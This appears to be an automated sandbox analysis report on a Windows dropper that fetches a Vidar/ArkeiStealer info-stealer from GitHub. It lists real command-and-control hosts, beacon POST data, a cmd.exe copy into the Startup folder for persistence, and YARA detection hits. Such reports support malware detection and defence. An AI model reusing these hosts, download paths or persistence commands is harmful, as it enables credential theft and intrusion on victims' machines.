                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: file_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: https://d.symcb.com/cps0%
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: https://d.symcb.com/rpa0
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: https://d.symcb.com/rpa0.
                        Source: file_22613.exe, 00000011.00000002.513954584.00000000037B0000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.478802065.0000000001519000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000002.511434019.00000000012F8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                        Source: file_22613.exe, file_22613.exe, 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://mastodon.online/
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.430045319.00000000026F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://north.ac/760
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.300992280.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430045319.00000000026F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://north.ac4
                        Source: file_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                        Source: file_22613.exe, 00000011.00000002.514627703.000000000D590000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.460609044.000000000D630000.00000040.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526539114.000000000F800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://t.me/hyipsdiges
                        Source: file_22613.exe, file_22613.exe, 00000011.00000002.513954584.00000000037B0000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.478802065.0000000001519000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000002.511434019.00000000012F8000.00000004.00000010.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://t.me/hyipsdigest
                        Source: file_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/hyipsdigestC
                        Source: file_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/hyipsdigestH
                        Source: file_22613.exe, 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://t.me/hyipsdigesthttps://mastodon.online/
                        Source: file_22613.exe, 00000011.00000002.511434019.00000000012F8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
                        Source: unknown | DNS traffic detected: queries for: north.ac
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Code function: 13_2_00407FCB InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle
                        Source: global traffic | HTTP traffic detected: GET /760 HTTP/1.1 | Host: north.ac | Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1 | Host: github.com | Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /neiqops/ajajaj/main/file_22613.exe HTTP/1.1 | Connection: Keep-Alive | Host: raw.githubusercontent.com
                        Source: global traffic | HTTP traffic detected: GET /hyipsdigest HTTP/1.1 | Host: t.me
                        Source: global traffic | HTTP traffic detected: GET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1 | Host: github.com
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
                        Source: unknown | Network traffic detected: HTTP traffic on port 49782 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49893
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49782
                        Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49893 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
                        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
                        Source: unknown | TCP traffic detected without corresponding DNS query: 94.130.174.62
                        Source: unknown | HTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: sigint.ws | Content-Length: 82 | Cache-Control: no-cache | Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 | Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: unknown | HTTPS traffic detected: 172.67.152.230:443 -> 192.168.2.4:49759 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49766 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49767 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 172.67.152.230:443 -> 192.168.2.4:49782 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49893 version: TLS 1.2
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Code function: 13_2_00402150 Sleep, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegOpenKeyExA, RegSetValueExA, RegCloseKey, GdiplusStartup, GetDC, RegGetValueA, RegGetValueA, GetSystemMetrics, GetSystemMetrics, GetSystemMetrics, RegGetValueA, GetSystemMetrics, GetSystemMetrics, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, GetMenuItemRect, BitBlt, GdipCreateBitmapFromHBITMAP, GdipGetImageEncodersSize, GdipGetImageEncoders, GdipSaveImageToFile, SelectObject, DeleteObject, DeleteObject, DeleteObject, ReleaseDC, GdipDisposeImage, GdiplusShutdown

                        System Summary

                        Source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing potential Windows Defender anti-emulation checks | Author: ditekSHen
                        Source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Vidar / ArkeiStealer | Author: ditekSHen
                        Source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing potential Windows Defender anti-emulation checks | Author: ditekSHen
                        Source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Vidar / ArkeiStealer | Author: ditekSHen
                        Source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing potential Windows Defender anti-emulation checks | Author: ditekSHen
                        Source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Vidar / ArkeiStealer | Author: ditekSHen
                        Source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing potential Windows Defender anti-emulation checks | Author: ditekSHen
                        Source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Vidar / ArkeiStealer | Author: ditekSHen
                        Source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing potential Windows Defender anti-emulation checks | Author: ditekSHen
                        Source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPE | Matched rule: Detects Vidar / ArkeiStealer | Author: ditekSHen
                        Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing potential Windows Defender anti-emulation checks | Author: ditekSHen
                        Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Vidar / ArkeiStealer | Author: ditekSHen
                        Source: 0XzeMRyE1e.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 0XzeMRyE1e.exe.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: file_22613[1].exe.13.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: file_22613.exe.13.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: 0XzeMRyE1e.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Vidar, author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Vidar, author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Vidar, author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Vidar, author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Vidar, author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                        Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_Vidar, author = ditekSHen, description = Detects Vidar / ArkeiStealer
                        Source: Process Memory Space: 0XzeMRyE1e.exe PID: 3220, type: MEMORYSTR | Matched rule: SUSP_Reversed_Base64_Encoded_EXE, date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
                        Source: Process Memory Space: 0XzeMRyE1e.exe PID: 6456, type: MEMORYSTR | Matched rule: SUSP_Reversed_Base64_Encoded_EXE, date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
                        Source: 0XzeMRyE1e.exe | Binary or memory string: OriginalFilename vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.308497314.0000000008DC0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMm.dll4 vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.308828876.00000000094E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameClassLibrary1.dll< vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.304281793.00000000037B8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMm.dll4 vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.300192087.0000000000438000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.301026710.00000000027CF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameClassLibrary1.dll< vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 0000000D.00000000.297399264.0000000000738000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.449695273.0000000008950000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMm.dll4 vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.446165725.0000000003708000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMm.dll4 vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.450200051.0000000008C00000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameClassLibrary1.dll< vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.430096466.000000000271F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameClassLibrary1.dll< vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.429393442.0000000000448000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe, 00000015.00000000.409956691.0000000000D88000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe | Binary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: 0XzeMRyE1e.exe.7.dr | Binary or memory string: OriginalFilenameZonli.exe, vs 0XzeMRyE1e.exe
                        Source: file_22613[1].exe.13.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: file_22613.exe.13.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: 0XzeMRyE1e.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0XzeMRyE1e.exe.logJump to behavior
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@13/5@9/8
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: 0XzeMRyE1e.exeVirustotal: Detection: 36%
                        Source: 0XzeMRyE1e.exeMetadefender: Detection: 14%
                        Source: 0XzeMRyE1e.exeReversingLabs: Detection: 65%
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\0XzeMRyE1e.exe "C:\Users\user\Desktop\0XzeMRyE1e.exe"
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\0XzeMRyE1e.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Users\user\Desktop\0XzeMRyE1e.exe C:\Users\user\Desktop\0XzeMRyE1e.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe"
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe"
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | File created: C:\Users\user\AppData\Local\Temp\1000007001\
                        Source: 0XzeMRyE1e.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Code function: 17_2_004163E3 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,17_2_004163E3
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_01
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | Mutant created: \Sessions\1\BaseNamedObjects\d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963user4
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | Mutant created: \Sessions\1\BaseNamedObjects\152138533219352125563209
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe | File read: C:\Windows\System32\drivers\etc\hosts
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: 0XzeMRyE1e.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
